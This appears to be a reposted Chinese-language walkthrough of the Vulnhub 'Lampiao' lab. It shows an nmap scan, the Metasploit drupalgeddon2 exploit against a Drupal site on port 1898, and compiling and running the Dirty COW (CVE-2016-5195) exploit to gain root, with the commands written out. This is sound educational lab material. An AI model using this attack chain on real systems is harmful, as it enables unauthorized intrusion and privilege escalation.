栏目分类:
子分类:
返回
名师互学网用户登录
快速导航关闭
当前搜索
当前分类
子分类
实用工具
热门搜索
名师互学网 > IT > 系统运维 > 运维 > Linux

Linux 脏牛漏洞提权 【Vulnhub靶场 Lampiao】

Linux 更新时间: 发布时间: IT归档 最新发布 模块sitemap 名妆网 法律咨询 聚返吧 英语巴士网 伯小乐 网商动力

Linux 脏牛漏洞提权 【Vulnhub靶场 Lampiao】

1.nmap 扫描主机

扫描同网段存活主机

扫描目标主机开放端口,扫描到开放了1898端口

nmap -p1-65535 192.168.61.138

2.发现web网站,搜集利用漏洞

通过开放的1898端口进入网站,看到目标网站,发现网站cms是drupal

msf 搜索drupal漏洞,使用可利用漏洞进行攻击

>search drupal
>use exploit/unix/webapp/drupal_drupalgeddon2
>set rhosts 192.168..61.138
>set rport 1898
>exploit



3.信息收集

上传信息收集脚本,发现存在脏牛提权漏洞

upload /tmp/linux-exploit-suggester.sh  /tmp/xxsj.sh

进入shell 执行信息收集脚本,执行结果中发现【CVE-2016-5195】脏牛漏洞

shell
chmod 777 xxsj.sh
./xxsj.sh


4.漏洞利用

上传exp

upload /tmp/40847.cpp  /tmp/exp.cpp

进入shell编译执行exp,得到登录密码

shell
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o exp exp.cpp -lutil
./exp

打开交互式shell,切换root用户,提权成功

python -c 'import pty; pty.spawn("/bin/bash")'

转载请注明:文章转载自 www.mshxw.com
本文地址:https://www.mshxw.com/it/642150.html
我们一直用心在做
关于我们 文章归档 网站地图 联系我们

版权所有 (c)2021-2022 MSHXW.COM

ICP备案号:晋ICP备2021003244-6号